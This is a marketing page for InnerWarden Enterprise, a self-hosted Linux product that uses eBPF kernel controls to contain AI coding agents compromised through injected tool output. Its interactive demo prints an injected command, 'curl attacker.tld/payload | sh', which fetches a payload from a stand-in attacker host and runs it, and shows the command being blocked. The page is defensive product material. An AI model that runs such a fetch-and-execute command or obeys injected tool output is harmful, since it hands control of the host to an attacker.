Skip to content
InnerWarden Enterprise · Active Defence stack

When agent controls fail, host controls hold.

Give autonomous agents the access to be useful, without making their process the final security authority.

InnerWarden Enterprise adds a Linux host boundary outside the agent: observe what actually happens, deny unauthorized execution and secret access in the kernel, verify containment, and preserve the evidence.

Self-hosted Local decisions No blind enforcement
Protection boundaryVerified
Production agentClaude Code · checkout service
Scoped
IntentInjected tool outputEscalated before execution
KernelUnknown binary · EPERMPayload never started
EvidenceOutcome verifiedDecision chain anchored
Compromise containedApproved work remains available.
Runtime depthTool call → syscall → outcome
Host intelligence82 detectors on Linux
Control postureObserve → rehearse → enforce
Data postureLocal-first · no mandatory cloud
Post-compromise containment

Security outside the thing being secured.

Agent guardrails reduce risk before an action. Enterprise assumes one of those controls can eventually be bypassed and keeps the last decision at the host boundary.

Execution

The agent does not decide what may execute.

On supported Linux kernels, an agent-scoped eBPF LSM gate denies unknown binaries before they start. Legitimate host workloads outside that process boundary continue normally.

bprm_check_security · scoped cgroup · hard EPERM
Data and network

Access is constrained at the point of use.

Secret Read Guard protects declared sensitive paths, while DNS Guard pre-authorizes destinations. Both complement agent policy with controls outside the model context.

file_open LSM · DNS allow policy · local decisions
Host response

See what actually happened after the tool call.

82 host detectors and 69 cross-layer correlation rules connect agent intent to process, file, identity, and network behaviour.

eBPF telemetry · verified outcomes · autonomous response
Assurance

Every decision remains attributable and reviewable.

Local decision history, host and tenant attribution, correction records, and signed off-host anchors create evidence for incident response and security review.

append-only records · hash chain · signed anchor
See the boundary decide

Useful access. Bounded consequences.

Switch between expected work and a compromised-agent path. The demo shows where Community contributes context and where Enterprise makes the final host decision.

Interactive control pathDeterministic demo
Injected execution chain
curl attacker.tld/payload | sh
Agent runtimeClaude Code
01 · GuardESCALATED

Risk surfaced

The tool chain is classified before it reaches the host.

signal · network + shell chain
High-risk intent identified
02 · Execution GateBLOCKED

Execution denied

Enterprise enforces outside the compromised agent process.

EPERM · eBPF LSM gate
Payload never starts
03 · EvidenceANCHORED

Block preserved

Attempt, decision, and enforcing control form one record.

block hash · f2b7…1d09
Tamper-evident evidence

The agent-side context is compromised. The execution boundary is not: Linux denies the payload before it starts, then preserves the block as evidence.

A safer route to enforcement

Never turn production into the policy test.

InnerWarden does not present configuration as protection. The live control must be compatible, scoped, armed, and verified before the dashboard can claim enforcement.

01

Observe real work

Establish the agent, host, and workload boundary without changing execution.

02

Rehearse the policy

Measure exactly what would be denied and resolve legitimate paths before cutover.

03

Enforce deliberately

Arm only on a compatible Linux host after a clean rehearsal and explicit operator approval.

04

Verify continuously

Compare configured state with the live kernel and retain the resulting evidence.

How to install it

One command on a Linux host, plus a licence.

The Active Defence stack installs on a Linux server and comes up in observe mode: it watches the machine and explains what it sees, and blocks nothing until you decide it should.

curl -fsSL https://innerwarden.com/install | sudo bash -s -- --license=/path/to/license.key

Installs the eBPF sensor, the host detectors, cross-layer correlation, autonomous response, and the Active Defence capabilities (Execution Gate, DNS Guard, anti-tamper watchdog). Linux only: eBPF needs a recent kernel and root. Prefer to read it first? Download the script, review it, then run it. Flags: ... | sudo bash -s -- --help

  1. 1. Get a licence. Pricing is scoped per deployment. Talk to us about a licence, or start a scoped pilot.
  2. 2. Install and activate. Run the command above on the host, passing the licence key we sent you. The licence is what selects the paid tier, so it goes in the install command rather than after it. It stays in observe: nothing is blocked yet.
  3. 3. Observe, rehearse, then enforce. Follow the rollout above. The dashboard only claims enforcement once the live control is compatible, scoped, armed, and verified.

Full steps, verification, and the unattended flags are in the install documentation. Already running the free guardrail? It keeps working: Active Defence adds the host layer underneath it.

The honest product boundary

Know exactly what you are buying.

Community is deliberately useful on its own. Enterprise is not a feature unlock dressed as security; it adds the host-enforced, operationally verified boundary required for production autonomy.

Compare the tiers
What Community gives every user

Cross-platform command and MCP screening, agent discovery, AI Jail where supported, local decisions, dashboard, token intelligence, and alerts.

What Enterprise adds

The Linux host sensor, eBPF visibility, agent-scoped kernel controls, autonomous response, signed evidence, and fleet or tenant operations.

What survives an agent compromise

In-path MCP proxy controls and the armed host or kernel boundary. Advisory checks alone remain bypassable if a hostile agent refuses to call them.

What the kernel guarantee requires

A supported Linux kernel with BPF LSM active, a verified live gate, an explicit scope, and a completed observe-and-rehearse workflow.

Production security pilot

Prove one critical agent workflow end to end.

We scope one agent, one threat model, one Linux deployment, and measurable pass/fail criteria. You finish with a tested control boundary and evidence your security team can review.

  • Architecture and threat-model workshop
  • Observe and rehearsal baseline
  • Controlled attack validation
  • Evidence review and rollout plan

Not ready for a production pilot? Install free and start building the agent decision history today.

Sent to our self-hosted Mautic instance. By submitting, you agree that we may contact you about InnerWarden early access. See our privacy policy.